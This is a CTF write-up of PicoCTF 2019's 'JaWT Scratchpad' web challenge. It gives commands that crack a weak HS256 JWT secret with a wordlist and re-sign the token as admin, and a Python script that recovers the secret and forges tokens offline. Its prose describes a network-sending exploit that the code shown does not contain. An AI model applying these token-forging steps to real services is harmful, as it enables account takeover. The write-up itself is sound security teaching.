🌐 JaWT Scratchpad

A detailed write-up of the Web challenge 'JaWT Scratchpad' from PicoCTF - 2019

/images/PicoGym/PicoCTF-2019/JaWTScratchpad/challenge_presentation.png
Challenge Presentation

📊 Challenge Overview

Category | Details | Additional Info
🏆 Event | PicoGym | Event Link
🔰 Category | Web 🌐 |
💎 Points | 500 | Out of 500 total
⭐ Difficulty | 🟡 Medium | Personal Rating: 3/10
👤 Author | John Hammond | Profile
🎮 Solves (at the time of flag submission) | 5.847 | solve rate
📅 Date | 21-02-2025 | PicoGym
🦾 Solved By | mH4ck3r0n3 | Team:

📝 Challenge Information

Check the admin scratchpad! https://jupiter.challenges.picoctf.org/problem/63090/ or http://jupiter.challenges.picoctf.org:63090

🎯 Challenge Files & Infrastructure

Provided Files

Files: None

🔍 Initial Analysis

First Steps

Initially, the website appears as follows:

/images/PicoGym/PicoCTF-2019/JaWTScratchpad/site_presentation.png
Site Presentation

Inspecting the JWT with https://jwt.io, I discovered that it is signed with HS256 (HMAC-SHA256). Because the HMAC secret is the only thing protecting the signature, a weak secret can be recovered offline by brute force, and once recovered it lets anyone re-sign the JWT:

/images/PicoGym/PicoCTF-2019/JaWTScratchpad/jwtio.png
Jwt.io

As soon as we see this algorithm, the first thing to try is jwt-cracker with rockyou.txt to attempt to recover the secret key, so let's proceed with the exploitation.

🔬 Vulnerability Analysis

Potential Vulnerabilities

  • JWT Secret Brute-Forcing

🎯 Solution Path

Exploitation Steps

Initial setup

As mentioned in the analysis phase, I will try to crack the secret key of the previously found JWT:

jwt-cracker -t eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoibUg0Y2szcjBuMyJ9.xQn4fQhEqxtvBjnOL0WYt11H1jJUZ6bF3kY24qaZtLg -d /usr/share/wordlists/rockyou.txt

/images/PicoGym/PicoCTF-2019/JaWTScratchpad/jwt_cracker.png
Jwt_Cracker

As we can see, the cracking was successful and the key ilovepico was found. With this key we can modify the JWT payload however we like and re-sign the token so that the server accepts it.

Exploitation

Since we need to access the site as the admin user, we must change the payload of the previously extracted JWT to {"user":"admin"} and sign the JWT with the key we found (ilovepico). This can be done in different ways, for example with a Python script using the jwt library, or directly from the CLI with jwt-tools:

python3 /home/mh4ck3r0n3/Tools/Web/jwt_tool/jwt_tool.py "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoibUg0Y2szcjBuMyJ9.xQn4fQhEqxtvBjnOL0WYt11H1jJUZ6bF3kY24qaZtLg" -S hs256 -I -pc user -pv admin -p "ilovepico"

/images/PicoGym/PicoCTF-2019/JaWTScratchpad/jwt_forged.png
Forged JWT

(for installation: jwt-tools). As we can see, it returns the forged token:

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiYWRtaW4ifQ.gtqDl4jVDvNbEe_JYEZTN19Vx6X9NNZtRVbKPBkhO-s

Now all that's left is to replace the old JWT value in the cookie (using Chrome DevTools, for example) and refresh the page (F5) so the new cookie is sent. This way I obtained the flag.

Flag capture

/images/PicoGym/PicoCTF-2019/JaWTScratchpad/manual_flag.png
Manual Flag

🛠️ Exploitation Process

Approach

The automated exploit takes a wordlist.txt argument and tries every entry as the HS256 secret until one reproduces the token's signature. As soon as it finds the valid key, it forges a token with user=admin, sends a request carrying the forged token, and extracts the flag from the response with a regex.
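The two steps the exploit automates (recover the secret offline, then re-sign the payload with user=admin), together with the verifier-side logic that decides whether a forged token is accepted, as an added example written for this write-up in stdlib-only Python; it is not the author's exploit script and makes no network request. DEMO_TOKEN and DEMO_WORDLIST are constructed here (the secret and username reuse the write-up's values); the verifier pins the algorithm to HS256 and uses a constant-time comparison, so it also shows why a token claiming "alg":"none" is rejected by a correctly written server.

```python
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional


def b64url_encode(data: bytes) -> str:
    """Base64url without padding, as JWT segments are encoded."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    """Restore the padding that JWT segments strip before decoding."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(header: dict, payload: dict, secret: str) -> str:
    """Build a compact JWT: b64url(header).b64url(payload).b64url(HMAC-SHA256)."""
    head = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    body = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    signing_input = f"{head}.{body}".encode("ascii")
    sig = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
    return f"{head}.{body}.{b64url_encode(sig)}"


def verify_hs256(token: str, secret: str) -> Optional[dict]:
    """Return the payload if `token` is a valid HS256 JWT under `secret`, else None.

    The algorithm is pinned by the verifier, not read from the token, so a
    header claiming "alg":"none" (or anything but HS256) is refused before the
    signature is examined; the signature check itself is constant-time.
    """
    try:
        head, body, sig = token.split(".")
        header = json.loads(b64url_decode(head))
        given_sig = b64url_decode(sig)
    except ValueError:  # wrong segment count, bad base64 or bad JSON
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    expected = hmac.new(secret.encode(), f"{head}.{body}".encode("ascii"),
                        hashlib.sha256).digest()
    if not hmac.compare_digest(expected, given_sig):
        return None
    return json.loads(b64url_decode(body))


def find_secret(token: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary search: recompute the signature for each candidate
    secret and compare it with the token's; the server is never contacted."""
    for candidate in wordlist:
        candidate = candidate.rstrip("\n")
        if verify_hs256(token, candidate) is not None:
            return candidate
    return None


def forge_token(token: str, secret: str, **claims) -> str:
    """Re-sign the token's payload with the given claims overridden, keeping
    the original header (what the jwt_tool command above does for user=admin)."""
    head, body, _ = token.split(".")
    header = json.loads(b64url_decode(head))
    payload = json.loads(b64url_decode(body))
    payload.update(claims)
    return sign_hs256(header, payload, secret)


# Constructed sample data: a token signed with a weak secret that appears in a
# tiny constructed wordlist standing in for rockyou.txt.
DEMO_SECRET = "ilovepico"
DEMO_TOKEN = sign_hs256({"typ": "JWT", "alg": "HS256"}, {"user": "mH4ck3r0n3"}, DEMO_SECRET)
DEMO_WORDLIST = ["123456", "password", "qwerty", "ilovepico", "letmein"]

if __name__ == "__main__":
    found = find_secret(DEMO_TOKEN, DEMO_WORDLIST)
    print("recovered secret:", found)
    admin_token = forge_token(DEMO_TOKEN, found, user="admin")
    print("forged token verifies as:", verify_hs256(admin_token, found))
    # A token that merely claims alg=none carries no signature and is refused.
    none_token = (b64url_encode(b'{"typ":"JWT","alg":"none"}') + "."
                  + b64url_encode(b'{"user":"admin"}') + ".")
    print("alg=none token accepted:", verify_hs256(none_token, found) is not None)
```

The wordlist search costs one HMAC-SHA256 per candidate and needs nothing but the captured token, which is why a secret drawn from a common-password list offers no real protection; the mitigation is a long random secret (or an asymmetric algorithm such as RS256/ES256) and a verifier that, like the one above, fixes the accepted algorithm instead of trusting the header.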

🚩 Flag Capture

Flag

Proof of Execution

/images/PicoGym/PicoCTF-2019/JaWTScratchpad/automated_flag.png
Automated Flag
Screenshot of successful exploitation

🔧 Tools Used

Tool | Purpose
Python | Exploit
Jwt-Cracker | JWT Secret Cracking

💡 Key Learnings

New Knowledge

I learned that the HMAC secret of an HS256-signed JWT can be brute-forced offline when it is weak, and that recovering it lets you forge arbitrary tokens.

Time Optimization

When facing a challenge with a JWT signed with HS256, we can try to brute-force the key right away, for example with jwt-cracker and a wordlist such as rockyou.txt. If that doesn't work, we can try the none algorithm, as done in the JAuth challenge.

Skills Improved

  • Binary Exploitation
  • Reverse Engineering
  • Web Exploitation
  • Cryptography
  • Forensics
  • OSINT
  • Miscellaneous

📚 References & Resources

Learning Resources


📊 Final Statistics

Metric | Value | Notes
Time to Solve | 00:13 | From start to flag
Global Ranking (at the time of flag submission) | | Challenge ranking
Points Earned | 500 | Team contribution

Created: 21-02-2025 • Last Modified: 21-02-2025 • Author: mH4ck3r0n3 • Team: